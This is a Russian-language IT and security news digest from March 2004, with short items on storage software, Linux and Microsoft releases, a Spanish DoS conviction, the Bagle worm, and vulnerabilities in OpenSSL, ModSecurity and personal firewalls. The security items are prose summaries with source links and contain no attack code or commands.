Компания DataCore предлагает интересное решение для корпоративных сетей, испытывающих нехватку дисковых объёмов на серверах. Недорогой программный пакет позволит привлекать винчестеры пользователей сети для хранения серверных данных. Порой в небольшой организации, владеющей одним-двумя серверами, заканчивается свободное пространство на дисках сервера, а новые винчестеры устанавливать уже некуда. Тогда на помощь придёт ПО SANmelody от DataCore, создающее "виртуальный жёсткий диск" из доступных дисковых ресурсов локальной сети. Теперь не придётся приобретать ещё один сервер, лишь для того чтобы установить в него дополнительные винчестеры. SANmelody может разбивать "виртуальный диск" на множество логических дисков, обеспечивая гибкое распределение дисковых ресурсов между разными задачами. Это позволяет оптимизировать работу, выделяя каждому процессу ровно столько пространства, сколько необходимо. К тому же, SANmelody обладает функцией зеркалирования данных, что критично при работе с информацией повышенной важности, и умеет делать это даже с удалёнными данными. Для ускорения доступа к "виртуальному диску" применяется кэширование. Поддерживаются устройства Ethernet iSCSI и сети на волоконной оптике. SANmelody функционирует в сетях под ОС Windows, Linux, Unix, NetWare и MacOS. Системные требования пакета скромны: сервер на процессоре Intel или AMD с частотой не ниже 300 МГц, 512 Мб ОЗУ, 65 Мб на диске для установки. Сервер должен работать под управлением Windows Server 2000, XP Home/Professional или Windows Server 2003. Кроме этого, необходима среда Microsoft .NET Framework Version 1.1.
Подробности - http://www.datacore.com/products/prod_SANmelody.asp

20/03/2004 09:55 Испанский суд приговорил организатора DoS-атаки к 7 годам тюрьмы.
Решением суда 26-летний житель испанского города Корунья Сантьяго Г.А. приговорен к семи годам лишения свободы за организацию целого ряда DoS-атак на серверы компании iRC Hispano, сообщает сайт GorilaX. Помимо тюремного заключения хакеру назначено еще и материальное наказание: он будет обязан выплатить штраф в размере 13,5 тысяч евро и компенсацию в размере 633743 евро. Свои преступления 26-летний испанец совершил в канун Рождества в 2002 году и весной 2003 года. Пользуясь чатами iRC Hispano под никами ronne, ronnie, san71ag0, schenker, hairyman, ddd, stokosky и steppenwolf, осужденный организовывал атаки на ресурсы компании, лишая возможности пользоваться интернетом одновременно до 3 миллионов испанских пользователей. Для реализации преступного замысла Сантьяго организовал рассылку специальной вредоносной программы, которой в декабре 2002 года оказалось заражено около 4 миллионов компьютеров по всему миру. Задержание сетевого вредителя стало результатом специальной операции «Ронни», проведенной уголовной полицией Испании. Выбирая серверы iRC Hispano для атаки, Сантьяго намеревался отомстить модераторам чатов. За нарушение правил общения iRC Hispano временно закрыло преступнику доступ к своим ресурсам.
Источник - http://www.viruslist.ru

20/03/2004 09:27 200 миллионов американцев имеют домашний выход в интернет.
Число американцев, имеющих доступ в интернет из дома, достигло более 204 миллионов человек, что составляет примерно три четверти всего населения США. Таковы результаты исследования, проведенного компанией Nielsen//NetRatings, которая занимается изучением интернет-аудитории. По ее подсчетам, с февраля прошлого года число американцев с домашним выходом в Сеть увеличилось на шесть процентов. В декабре прошлого года Федеральная комиссия США по коммуникациям представила результаты своих исследований, согласно которым в США насчитывается 170 миллионов интернет-пользователей. При этом комиссия объявила, что за последние полгода число американцев с высокоскоростным доступом в интернет выросло на 18 процентов и составило 23,6 миллиона человек. По данным компании Ipsos-Reid на январь 2004 года, в России интернетом пользуются лишь 10 процентов городского населения. Вместе с тем темпы роста российской интернет-аудитории являются одними из самых высоких в мире. Ipsos-Reid подсчитала, что в прошлом году число российских пользователей увеличилось на четверть. Примечание ньюсмейкера - в том, что очень многие ламериканцы имеют выход в Интернет есть и свой очень большой минус. Разбирая лог-файлы почтового сервера каждый день убеждаюсь, что огромное количество (намного превышающее 50%) спама идёт именно из американских сетей. Причин видится несколько - более низкий уровень квалификации домашних пользователей в части безопасности и, естественно, большая скорость DSL-сетей по сравнению с обычным диал-апом в России.
Подробности - http://lenta.ru/internet/2004/03/19/access/

19/03/2004 16:24 Mozilla.org борется с пиратами.
Организация Mozilla Foundation, созданная прошлым летом для обеспечения финансирования разработки и распространения программных продуктов, создаваемых сообществом Mozilla.org, начала борьбу с пиратством. И хотя все программы, создаваемые Mozilla.org, имеют открытый код и распространяются бесплатно, с торговыми марками и логотипами дело обстоит сложнее. Они зарегистрированы Mozilla Foundation в качестве торговых марок и находятся под защитой соответствующих американских законов. До последнего времени внимание на этом не акцентировалось, однако 16 марта Фондом было опубликовано открытое письмо, подписанное одним из ведущих разработчиков Mozilla Джервесом Маркхэмом и адресованное всем торговцам товаров с символикой Mozilla. В письме говорится, что, поскольку Mozilla Foundation владеет правами на торговые марки Mozilla, Firefox и логотип Firefox (лиса на фоне земного шара), то продажа товаров с этими знаками требует официального разрешения со стороны Фонда Mozilla.
В Mozilla Foundation хотели бы контролировать качество изделий со своими торговыми марками, а также получать часть доходов от их реализации. Всем лицам, продающим товары с символикой Mozilla или Firefox необходимо немедленно прекратить торговлю и связаться с Mozilla Foundation для обсуждения условий лицензирования.
Источник - http://www.nixp.ru

19/03/2004 16:07 Chkrootkit Portsentry Howto.
Наверняка этот документ будет полезен системным администраторам и тем, кто занимается безопасностью. Фалько Тимме написал краткое руководство по проверке линукс-бокса на предмет червей, руткитов и прочей дряни, и по обнаружению прочей хаксорской активности, сообщается на linux.org.ru. Написано действительно очень кратко, так что есть смысл отправить автору документа свои предложения и дополнения.
Howto - http://www.falkotimme.com/howtos/chkrootkit_portsentry/index.php

19/03/2004 14:01 Найден старейший компьютер в Москве.
Газета «Комсомольская правда» совместно с московским представительством компании Oki Europe Ltd. провела конкурс на самый старый работающий в Москве и Московской области компьютер. Экспертиза проводилась сотрудниками российского Политехнического музея. На конкурс были представлены свыше 50 моделей. Старейшим компьютером в Москве был признан Censor-932 шведской компании Datasaab выпуска 1976 года. Этот компьютер работает на очень важном и ответственном участке в Московском центре автоматизированного управления воздушным движением в аэропорту Внуково, где под него отведено целое здание. Компьютер-ветеран имеет следующую конфигурацию: процессор с частотой 400 кГц, оперативная память 1,5 Мб, два жестких диска объемом по 29 Мб каждый. Системный блок компьютера занимает целое помещение размером с волейбольную площадку. Censor-932 обрабатывает информацию с 40 диспетчерских мест, а одновременно за ним могут работать до 100 человек. По заверениям сотрудников аэропорта, серьезных сбоев в работе «старичка» пока не наблюдалось, что неудивительно, ведь в свое время компьютеры производства Datasaab могли сравниться по качеству с продукцией IBM.
Источник - http://www.compulenta.ru

19/03/2004 12:57 Novell планирует капитальное обновление Linux.
В мае компания, ставшая после приобретения SuSE Linux вторым по величине продавцом Linux, предложит версию своей операционной системы с открытым исходным кодом на базе нового ядра. SuSE Linux 9.1 Professional использует ядро Linux 2.6 — капитальное обновление ядра Linux, призванное сделать операционную систему более динамичной. Новая версия SuSE, которая будет стоить 59,95 долл., поддерживает процессоры х86 с 64-битными расширениями от Intel и Advanced Micro Devices, что упростит доступ к оперативной памяти емкостью свыше 4 Гбайт. Novell выпустит также версию Personal за 29,95 долл., предназначенную для начинающих пользователей, которую можно исполнять непосредственно с CD-ROM — чтобы попробовать Linux, не прибегая к полномасштабной инсталляции. Novell анонсировала новые версии SuSE Linux в четверг на выставке CeBIT в Ганновере.
Подробности - http://zdnet.com.com/2100-1104_2-5175181.html

19/03/2004 12:42 Описание семейства протоколов TCP/IP.
Возможно, это уже пробегало где-то, но ссылку на такую книгу и продублировать не грех. Вашему вниманию предлагается перевод на русский язык замечательной книги "TCP/IP Illustrated" автора Richard Stevens (издательство Prentiss Hall - кажется так). Перевод озаглавлен как "TCP/IP крупным планом". Рекомендуем прочитать эту книгу.
Книга - http://www.zeiss.net.ru/docs/technol/tcpip/tcp00.htm

19/03/2004 11:37 Готовится к выходу браузер Opera 7.50 для Mac.
На форуме разработчиков браузера Opera появилась любопытная информация от службы техподдержки. Согласно полуофициальному сообщению, готова к выходу Мас-версия Opera 7.50 Preview 3. Это не полностью завершённая версия программы, и её пользователи не смогут воспользоваться поддержкой компании. Браузер пока нельзя будет ни купить, ни зарегистрировать, но его можно скачать и пользоваться Opera for Mac сколь угодно долго. Для работы требуется Mac OS X 10.1 или более новая ОС, а также новейший Flash-плагин. В финальной версии Opera for Mac будут реализованы поддержка Unicode, синхронизация с адресной книгой и поддержка Liveconnect. Движок браузера написан "с нуля" за целый год. Тепрь, среди прочего, движок Presto умеет работать с текстами, пишущимися справа налево, например, на арабском языке и иврите. Подвергся переработке почтовый клиент Opera Mail, известный ранее как М2. Теперь он работает с почтой, новостными группами и RSS-технологиями, доступны протоколы POP3, IMAP и ESMTP. Внедрена поддержка IRC, каналы отображаются в специальной панели Chat. При подключении к IRC-серверу нажатием клавиш Cmd+Alt+J можно получить доступ к свободным каналам. Для отработки IRC-технологии в Opera открыли IRC-сеть OperaNet, в которой функционируют два сервера - irc.opera.com и irc.se.opera.com.
Подробности - http://snapshot.opera.com/mac/m750p3.html#detail

19/03/2004 10:31 Появление 3-х новых версий червя I-Worm.Bagle.
"Лаборатория Касперского" сообщает об обнаружении трех новых версий червя I-Worm.Bagle. Все три версии распространяются через интернет в виде ссылки на зараженный веб-сайт, а также через файлообменные сети. Червь обладает функцией заражения исполняемых файлов. Червь представляет собой PE EXE-файл, размером около 25KB. Червь упакован при помощи UPX. Размер распакованного файла - около 65КB. Характеристики зараженных писем такие. Адрес отправителя выбирается произвольно из списка: administration, antispam, antivirus, management, noreply, staff, support. В качестве домена отправителя используется домен получателя зараженного письма. Тема письма также выбирается произвольно из списка. Письмо содержит в себе VBS-скрипт, который, будучи запущен пользователем вручную, использует уязвимость в Microsoft Internet Explorer, описанную в информационном бюллетене MS03-040 для загрузки из интернета с одного из нескольких десятков зараженных сайтов непосредственно исполняемого файла червя.
Подробности - http://www.viruslist.ru/alert.html?id=144822191

19/03/2004 10:24 Евросоюз грозит Microsoft многомиллионными штрафами.
Европейский союз и корпорация Microsoft не смогли договориться по вопросам деятельности компьютерной компании на европейском рынке, сообщается на сайте BBC News. Европейская комиссия по антимонопольной политике обвиняет Microsoft в намеренном ограничении доступа потребителей к аудио-визуальному программному обеспечению других компаний. В частности, Евросоюз не устраивает, что в операционную систему Windows включен собственный мультимедийный проигрыватель компании Media Player. Кроме того, еврокомиссия настаивает на том, чтобы корпорация поделилась исходными кодами Windows со своими конкурентами или выпустила "урезанную" версию операционной системы без проигрывателя, чтобы пользователи могли выбрать программное обеспечение на свой вкус.
Источник - http://www.lenta.ru

18/03/2004 18:51 Cтатья о Владимире Левине.
Не удалось удержаться от опубликования ссылки на ещё одну статью, обнаруженную в закромах "Коммерсанта" благодаря уважаемому сайту www.revolver.ru. Статья называется "Первооткрыватель крупнейшего банка Америки" и посвящена описанию "дела", которое в 95 году прошлого века облетело все новостные агенства мира. Речь идёт о взломе известного во всём мире банка "Ситибанка" российским гражданином Владимиром Левиным. На самом в деле в деле (каламбур) намного больше тумана, чем ясности. В преддверии возвращения хакера N1 (спорное утверждение - ну да ладно) на Родину, которое может иметь место "Коммерсант" излагает суть этой нашумевшей истории.
Статья - http://www.kommersant.ru/k-money/story.asp?m_id=488

18/03/2004 18:17 Написание PHP кода устойчивого к ошибкам.
Завершая обзор опубликованных статей, хотелось бы обратить внимание на статью Александра Неткачева, опубликованную на сайте www.opennet.ru, в которой автор постарался обобщить технику и приемы, позволяющие минимизировать количество ошибок в программе, написанной на PHP. Наверняка будет полезна программистам, пишущим скрипты на популярном скриптовом языке PHP для Вэб-сайтов.
Статья - http://www.opennet.ru/base/dev/safe_php_prog.txt.html

18/03/2004 16:08 Статья о маршрутизаторах.
Статья на сайте thg.ru (Tom's hardware guide) под названием "Маршрутизаторы: краткий справочник по терминологии и функциям" представляет собой именно то, что вынесено в её название - неплохой справочник по терминам и функциям совеременных маршрутизаторов. Рассматриваются основные типы соединений и особенности порта WAN, особенности реализации и функционирования DHCP-сервера, перенапрвление портов и виртуальные серверы, основы контроля доступа и механизма фильтрации, функционирование виртуальных сетей (VPN).
Cтатья - http://www.thg.ru/network/20040225/index.html

18/03/2004 15:30 Задраить порты!
Под таким заголовком опубликована в PC Magazine cтатья Бретта Гласса. В общем то, что рассказывает автор большинству (надеюсь, подавляющему) пользователей известно, но в плане общего ликбеза (особенно для начинающих) вполне можно порекомендовать к прочтению. Описано вкратце - что это за зверь такой - "порт", как определить открытые порты стандартными и нестандартными средствами и, собственно, как эти самые порты закрыть.
Статья - http://pcmagazine.ru/?ID=428503

18/03/2004 15:19 Обзор московского рынка широкополосного доступа.
На сайте издательского дома "Компьютерра" опубликована в свободном доступе статья Александра Милицкого "Портрет новейшей эпохи (триптих)". В этом весьма объемном материале подробно проанализировано состояние московского рынка широкополосного доступа, включая профиль пользователя, структуру ценообразования провайдеров и перспективы развития. Приводится ряд численных оценок, многие из которых ранее не публиковались в открытых источниках.
Статья - http://www.computerra.ru/business/metroareanetworks/

18/03/2004 14:56 Страсти по Kazaa.
Компания Sharman Networks, выпускающая популярный P2P-клиент Kazaa и известная своим нервным отношением к альтернативным клиентам, равно как и натянутыми отношениями со звукозаписывющей индустрией, в очередной раз столкнулась с обвинением в нарушении авторских прав, сообщает dl на своём сайте www.bugtraq.ru. Но на сей раз удар последовал не от звукозаписывающих компаний, а от румынского программиста Фабиана Тоадера, заявившего, что ему принадлежат права на фрагменты кода Kazaa. По словам Тоадера, он написал этот код, работая в 2000 году в качестве фрилансера на голландскую компанию Kazaa BV, которая в 2002 перепродала права на программу Sharman Networks. Но поскольку он не заключал официального контракта с Kazaa BV, он настаивает, что по-прежнему обладает правами на код Kazaa Media Desktop. Этот вопрос уже поднимался в прошлом августе, когда Sharman обвинила Тоадера в попытке шантажа, ну а сейчас Тоадер предпринял очередную попытку заставить компанию поделиться своими миллионами, заработанными, как он считает, на его коде. Кстати, с некоторых пор Тоадер покинул ряды "свободных художников" и уехал из Румынии. Сейчас он живет в Редмонде и работает в Microsoft (какое занятное совпадение - прим. ньюсмейкера).
Подробности - http://www.theregister.co.uk/content/6/36336.html

18/03/2004 14:32 "Пачка" бета-версий от Microsoft.
Выпущены тестовые версии целого ряда программных продуктов Microsoft, реализующих функции управления системами. Объявлено, в частности, о выходе "бет" Windows Update Services ("наследницы" системы управления заплатами Software Update Services), Microsoft Operations Manager (MOM) 2005, MOM 2005 Express, System Center 2005 и Device Management feature pack for Systems Management Server 2003. Несмотря на "2005" в названиях, финальные версии System Center и MOM планируется выпустить в нынешнем году. Windows Update Services немного отстает от расписания, - продукт выйдет в конце текущего года, хотя изначально выпуск планировался на первое полугодие. Специальная редакция MOM - MOM Express 2005, по словам представителей Microsoft, создана в качестве удешевленной модификации инструментария управления средами на базе Windows Server, реализующей только функции мониторинга. Device Management feature pack for SMS 2003 представляет собой расширение Sуstems Management Server 2003, которое позволит с его помощью управлять мобильными устройствами на базе платформ Microsoft. Все перечисленные продукты разрабатываются корпорацией в рамках инициативы Microsoft Dynamic Systems Initiative (DSI), цель которой - повысить степень автоматизации управления ИТ-средами.
Источник - http://www.osp.ru

18/03/2004 14:17 Программисты снимут пробу с Visual Studio 2005.
На будущей неделе Microsoft планирует представить промежуточную версию своего инструмента разработки Visual Studio 2005 и выпустить серверный пакет ПО распознавания речи. В следующую среду на конференции разработчиков в Сан-Франциско Билл Гейтс проведет презентацию, посвященную Visual Studio, речевым технологиям и разработке мобильных приложений. Ожидается, что на этой же конференции компания распространит последнюю (technology preview) версию Visual Studio 2005, капитальное обновление своего флагманского инструментария для разработчиков. На прошлой неделе софтверный гигант сообщил о задержке выпуска Visual Studio 2005 до первого полугодия будущего года и пообещал приступить к программе тестирования в ближайшие месяцы. На конференции компания планирует также представить серверное ПО для интеграции в Windows приложений распознавания речи Microsoft Speech Server 2004. А еще, по словам представителя Microsoft, там будут изложены новые подробности о .Net Compact Framework 2.0. Эта структура, которую Гейтс анонсировал год назад, представляет собой программную арматуру, необходимую для работы приложений веб-сервисов на карманных устройствах. ПО .Net позволяет программистам писать приложения с применением широко распространенного комплекса Visual Studio .Net 2003, не прибегая к специализированным инструментам.
Источник - http://www.zdnet.ru

18/03/2004 13:45 Новая версия дистрибутива SuSE Linux.
Компания Novell объявила о выходе новой версии дистрибутива SuSE Linux с номером версии 9.1. Это первый дистрибутив SuSE Linux, выпущенный после вхождения одноименной компании в состав Novell. Кроме того, SuSE Linux 9.1 - это первый завершенный коммерческий дистрибутив Linux, основанный на ядре версии 2.6, выпущенном в самом конце прошлого года. SuSE Linux 9.1 будет поставляться в двух вариантах: Personal и Professional, предназначенных, соответственно, для персонального использования и профессионального применения в широком круге вычислительных систем - от настольных ПК до серверов. При этом SuSE Linux 9.1 поддерживает как обычные 32-разрядные процессоры, так и 64-разрядные чипы AMD Opteron и Athlon 64, а также не выпущенные пока процессоры Intel с новыми 64-разрядными расширениями Extended Memory 64 Technology. Вариант SuSE Linux 9.1 Personal поставляется на двух компакт-дисках. Один из них, под названием LiveCD, позволяет загружать систему с компакт-диска, не устанавливая ее на винчестер.
Подробности - http://www.novell.com/news/press/archive/2004/03/pr04018.html

18/03/2004 13:10 Обновление Windows XP меняет облик.
В среду Microsoft выпустила предфинальную версию второго капитального обновления Windows ХР, которая наделяет операционную систему новыми средствами защиты. Версия Release Candidate 1 (RC1) сервисного пакета Service Pack 2 (SP2) для Windows XP содержит ряд существенных изменений по сравнению с прошлогодней опытной версией. Версии ПО RC1 обычно служат мостом между бета- и финальными версиями и содержат изменения, внесенные в ПО по результатам бета-тестирования. Финальная версия SP2 должна появиться во втором квартале текущего года. Сервисные пакеты объединяют поправки и обновления продуктов, периодически выпускаемых Microsoft. Новая версия SP2 уже доступна зарегистрированным бета-тестерам Microsoft и позднее будет выложена для более широкого доступа на сайты компании TechNet и Microsoft Developer Network. Важнейшим новшеством RC1 стало добавление Windows Security Center, нового инструмента, упрощающего доступ к настройке параметров защиты для разных компонентов Windows, говорит главный продакт-менеджер отделения Microsoft Windows Грег Салливан. Вместо того, чтобы лазать по разным меню Preferences в Internet Explorer, настройках подключений, системе Windows Update и других инструментах, пользователи ХР смогут управлять всем этим из Windows Security Center. «Проблема, которую мы решаем, заключается в том, что сегодня, если вы захотите управлять параметрами безопасности Windows, вам придется обойти много мест… и даже опытный пользователь не всегда сразу их найдет, — пояснил Салливан. — В Windows есть технология, гарантирующая защиту, но мы недостаточно поработали над тем, чтобы сделать ее очевидной». В RC1 расширена область применения нового средства для блокировки pop-up рекламы в веб-браузере IE. Руководствуясь положительными отзывами пользователей, Microsoft сделала pop-up-блокировщик включенным по умолчанию для всех сайтов, кроме сайтов интрасети компании. В RC1 усовершенствован сервис Windows Update, облегчающий автоматическую установку критических обновлений операционной системы. «Отчасти это ответ на некоторые опасные эксплойты, появившиеся прошлой осенью, — сказал Салливан. — Мы хотели облегчить пользователям защиту от них».
Подробности - http://zdnet.com.com/2100-1104_2-5174903.html

18/03/2004 12:51 Специалисты IBM готовы к созданию сверхдешевых микросхем.
Корпорация IBM сделала решающий шаг к созданию дешевых микросхем, сообщает Reuters. Как говорится в заявлении, опубликованном компанией, ее исследователи нашли способ растворить до жидкого состояния полупроводники значительно более высокого качества, чем удавалось ранее. IBM утверждает, что производительность микросхем, изготовленных с применением новой технологии, будет в 10 раз выше за счет того, что теперь напыляться будут высококачественные полупроводники, и соответственно снизится цена конечного продукта. Речь идет о методе spin coating, который заключается в нанесении капель жидкого раствора на пластинку, при вращении которой жидкость равномерно растекается по поверхности, создавая пленку. Проблема заключалась в том, что ранее в этой технологии использовались материалы более низкого качества, и ее эффективность была невысока. Получающееся в результате покрытие можно будет использовать в микросхемах, которые позволят создать дешевые гибкие дисплеи, смарт-карты, сенсоры для солнечных элементов или электронных приборов, покрытых электроизоляцией.
Источник - http://www.lenta.ru

17/03/2004 18:24 Готовится к изданию "настольная книга" по написанию эксплоитов.
Готовится к изданию довольно интересная и полезная книга из серии "how to" под названием "The Shellcoder's Handbook: Discovering and Exploiting Security Holes", которая анонсируется ни много, ни мало, как книгу по описанию технологии написания эксплоитов. Авторами книги явяются такие люди, как: Dave Aitel - основатель известнейшей секьюрити-компании Immunity (Нью Йорк), Chris Anley - директор не менее известной британской компании NGSSoftware. В книге описываются как методы и способы написания шелл-кодов ОС Windows, так и описание типичных атак, предназначенных для переполнения кучи (стека) и нарушения корректного функционирования ядра открытых систем (рассматриваются HP's Tru64, Sun's Solaris, Linux). Каждая из глав снабжена подробнейшими примерами. При этом авторы категорически отвергают обвинения в пособии для хакеров и утверждают, что писали книгу для системных администраторов, которые хотят получить углубленные сведения об улучшении безопасности системы. Книга будет издаваться John Wiley & Sons и ожидается 22 марта.
Подробности - http://www.nwfusion.com/news/2004/0315experpubli.html

17/03/2004 17:10 Уязвимости в OpenSSL.
Команда разработчиков проекта OpenSSL, задачей которого является создание и поддержание криптозащищённого канала с Вэб-серверами, объявили о наличии уязвимостей в этом довольно популярном пакете. Первая уязвимость связана с использованием нулевого указателя во внутренней функции do_change_cipher_spec(), что может позволить удалённому атакующему при организации этапа "приветствия" (handshake - начальный этап установки соединения) по SSL/TLS-протоколу при помощи специально сформированнного пакета вызвать DoS Вэб-сервера (в некоторых случаях - в IOS фирмы CISCO вызвать также перезагрузку). Многие приложения, использующие библиотеки OpenSSL также уязвимы. Вторая уязвимость связана с использованием Kerberos при организации обмена ключами по SSL/TLS-протооколу. В этом случае уязвимости подвержено меньшее количество приложений, ввиду довольно ограниченного круга использования Kerberos. Уязвимы обе ветви в данный момент поддерживаемые разработчиками - 0.9.6 и 0.9.7. Выпущены обновлённые версии - 0.9.7d и 0.9.6m. Большинство разработчиков дистрибутивов (в том числе и CISCO) выпустили собственные обновлённые версии OpenSSL.
Подробности - http://www.openssl.org/news/secadv_20040317.txt

17/03/2004 16:57 Уязвимость в ModSecurity.
Уязвимость обнаружена в приложении ModSecurity, предназначенного (по иронии судьбы) для обнаружения и предотвращения попыток взлома Вэб-сервера Apache 2.х. При включённой директиве "SecFilterScanPost" модуль осуществляет проверку входящий POST-запросов. Из-за некорректной реализации алгоритма проверки этих запросов возникает возможность однобайтового переполнения буфера (off-by-one), что может позволить удалённому атакующему выполнить произвольный код спривилегиями пользователя, от имени которого запускается Вэб-сервер. Уязвимость обнаружена в версии 1.7.4 и устранена в недавно вышедшей версии 1.7.5.
Подробности - http://www.s-quadra.com/advisories/Adv-20040315.txt

17/03/2004 16:02 США собираются жаловаться на Китай в ВТО.
Поводом для тяжбы стало требование китайского правительства, согласно которому все импортные чипы, используемые в устройствах беспроводной связи, должны напрямую поддерживать китайские стандарты криптозащиты. По информации журнала The Inquirer, ссылающегося на газету Wall Street Journal, администрация президента Дж. Буша-мл. посчитала китайское «беспроводное» эмбарго прямым нарушением устава Всемирной торговой организации и уже объявила о своем намерении подать соответствующую жалобу в ВТО. Еще одной причиной недовольства президента Буша стал 17-процентный налог на добавленную стоимость, от которого освобождены местные производители интегральных схем. По мнению авторов журнала, Китай, имеющий 120-миллиардный профицит в торговле с США, скорее всего, даже не заметит американской жалобы. В конце концов, если верить экспертам, именно Китаю предстоит стать «Великим драконом» полупроводникового бизнеса. А помогут ему в этом западные компании, которых привлекает дешевизна местной рабочей силы и трогательная забота правительства.
Источник - http://www.internet.ru

17/03/2004 14:26 Австралию признали пятой в мире по числу киберпреступлений.
Австралия стала местом совершения подавляющего большинства преступлений в сфере информационной безопасности в азиатско-тихоокеанском регионе, сообщает сайт газеты Courier Mail. По данным отчета производителя антивирусного программного обеспечения Symantec, по числу киберпреступлений Австралия заняла пятое место в общем списке из 180 стран, пропустив вперед лишь США, Канаду, Китай и Японию. Эксперты Symantec также отметили значительный рост числа инцидентов, связанных с возможным похищением конфиденциальных данных с электронных носителей. Прирост таких угроз за второе полугодие 2003 года составил 519% по сравнению с аналогичным периодом 2002 года. Указанные тенденции связаны с увеличением числа уязвимых для атак компьютеров и появлением более совершенных вирусов. В исследовании подчеркивается, что число атак, проведенных с австралийских компьютеров, вовсе не означает, что в этой стране живет самое большое количество хакеров в азиатско-тихоокеанском регионе. Вполне вероятно, что машины на территории Австралии используются для преступлений жителями других стран.
Подробности - http://www.thecouriermail.news.com.au/common/story_page/0,5936,8989104^8362,00.html

17/03/2004 13:52 Перейти с MS Office на StarOffice станет легче.
Компания Sun Microsystems планирует выпустить для своего настольного пакета ПО StarOffice новые инструменты, которые должны облегчить переманивание пользователей Microsoft Office. В этом году компания выпустит обновление к StarOffice, куда войдут конверторы для перевода в StarOffice макросов, созданных в Microsoft Office. Об этом сообщил репортерам глава отделения программного обеспечения Sun Джонатан Шварц. Кроме того, к лету Sun предложит новые инструменты для дистанционного управления компьютерами со StarOffice и другими программами, входящими в Sun Java Desktop System, в корпоративных сетях. Менеджер отдела маркетинга Sun Маниш Пунжаби отметил, что оба дополнения направлены на снятие технологических преград, стоящих на пути у тех пользователей Office, которые рассматривают StarOffice в качестве дешевой альтернативы. Инструмент для перевода макросов будет приводить макросы Microsoft Excel к виду, распознаваемому и исполняемому в электронной таблице StarOffice Calc. Усилия и знания, необходимые для создания этих минипрограмм, используемых для автоматизации трудоемких задач вроде вычисления комиссионных в электронной таблице и форматирования документов в редакторе текста, заставляют многих пользователей отказываться от замены одного настольного пакета другим.
Подробности - http://zdnet.com.com/2100-1104_2-5173579.html

17/03/2004 13:14 Дыры в персональных брандмауэрах Norton Personal Firewall и BlackICE.
Компания eEye Digital Security опубликовала несколько новых сообщений о дырах в популярных программных продуктах. На этот раз проблемы возникли у двух поставщиков персональных брандмауэров - программ, призванных оградить пользователей персональных компьютеров от нежелательных вторжений из интернета. Однако, как оказалось, и сами брандмауэры могут стать мишенью для хакеров, знающих уязвимые места данных программ. Сообщение о дырах в программах RealSecure и BlackICE компании Internet Security Systems (ISS) было опубликовано 8 марта. Пока ISS не выпустила заплатку для дыры, на сайте eEye доступно лишь базовое описание уязвимости. В нем говорится, что дыра может использоваться анонимно и удаленно, что приводит к получению хакером наивысшего уровня доступа к системе. Уязвимость актуальна для всех версий RealSecure и BlackICE. По классификации eEye, дыра имеет высокую опасность. 9 марта eEye опубликовала информацию и о дырах в пакетах интернет-безопасности от компании Symantec. Брешь имеется в брандмауэре Norton Personal Firewall 2004 и включающих его пакетах Norton Internet Security 2004 и Norton Internet Security 2004 Professional. Дыра позволяет злоумышленнику удаленно организовывать DoS-атаку на уязвимую машину. Данная уязвимость также является высокоопасной. Подробности о ней станут известны после выпуска необходимой заплатки.
Уязвимость в BlaskICE - http://www.eeye.com/html/Research/Upcoming/20040308.html
Уязвимость в Norton Personal Firewall - http://www.eeye.com/html/Research/Upcoming/20040309.html

17/03/2004 12:42 Компьютерная преступность уходит в «тень».
Механизмы и способы совершения преступления в сфере компьютерных технологий специфичны, имеют высокий уровень латентности. Так, по данным Национального отделения ФБР по компьютерным преступлениям от 85% до 97% компьютерных посягательств даже не выявляются. По оценкам иных экспертов, латентность «компьютерных» преступлений в США достигает 80%, в Великобритании — до 85%, в ФРГ — 75%, в России — более 90%. За рубежом, где накоплена достаточно большая и достоверная статистика компьютерных преступлений, до суда доходят меньше 1% нарушений. При этом следует помнить, что, по утверждению специалистов, ревизия в состоянии выявить не более 10% электронных хищений. К причинам латентности компьютерной преступности, в первую очередь, относят нежелание потерпевшей стороны (предприятия, учреждения, организации или отдельных граждан) сообщать в правоохранительные органы о преступных посягательствах на их компьютерные системы. Причины этих действий могут быть различные. Иногда руководители опасаются подрыва своего авторитета в деловых кругах и в результате - потери большого числа клиентов, раскрытия в ходе судебного разбирательства системы безопасности организации, выявления собственной незаконной деятельности. Согласно исследованиям ФБР США всего 17% опрошенных компаний заявили, что они готовы сообщать в правоохранительные органы о случаях несанкционированного вторжения в их компьютерные системы.
Источник - http://www.crime-research.ru

16/03/2004 20:14 В Великобритании открылись "хакерские" курсы для IT-специалистов
Как сообщает Computer Weekly, британские специалисты в области IT впервые получили возможность пройти практический курс хакерской этики. Главная цель нового курса - предоставить инженерам, работающим с операционными системами Windows и Linux, а также с TCP/IP-протоколами, возможность укрепить безопасность информационных систем своих компаний. По словам основателя учебной программы Роджера Чэпмена (Roger Chapman), до открытия в Великобритании курсы хакерской этики в течение нескольких месяцев просуществовали в США. "Существует множество курсов безопасности для специалистов, однако практическая возможность научиться думать, как хакер уникальна", - отметил Чэпмен. Полная стоимость курсов хакерской этики составляет 2950 фунтов стерлингов (152 тысячи рублей). Занятия предусматривают ежедневную учебную нагрузку до 12-14 часов в день. Перед началом занятий все слушатели подписывают документ, удостоверяющий их отказ от намерения использовать полученные знания в преступных целях. Обязательным условием для обучения является знание операционной системы Linux, наиболее часто используемой хакерами для совершения преступлений. Инженерам, не владеющим Linux за дополнительную плату предоставляется возможность пройти предварительную подготовку.
Источник - www.viruslist.com

16/03/2004 15:06 У Microsoft опять неполадки с патчем.
Похоже, знаменитая Microsoft лучше всех в IT-индустрии следует знаменитому афоризму г-ну Черномырдина: "Хотели как лучше, а получилось, как всегда". Очередной ляп с патчем к продуктам M$ Обнаружился на днях. Последний апдейт к Microsoft Office XP сделал невозможным использование некоторых популярных фильтров против спама. Производители программ пытаются найти выход. Проблема обнаружилась сразу после выпуска третьего сервис-пака от Office XP и Office 2000, являющимися одними из последних версий известного продукта. В числе прочих изменений с появлением сервис-пака были решены некоторые проблемы с безопасностью почтового клиента Outlook. Однако, похоже, что внесенные исправления были не до конца корректными. При использовании антиспамерских фильтров, выдается сообщение о том, что некоторая программа пытается получить доступ к записной книжке Outlook. Новый сервис-пак блокирует записную книжку, опасаясь, по всей видимости, вирусной атаки. От последнего апдейта пострадала в том числе программа Norton AntiSpam от Symantec. Производители антиспамерских программ пытаются в срочном порядке обойти внесенные исправления от Microsoft.
Источник - http://www.securitylab.ru

16/03/2004 14:21 В рамках Дальневосточного интернет-форума пройдет конкурс хакеров.
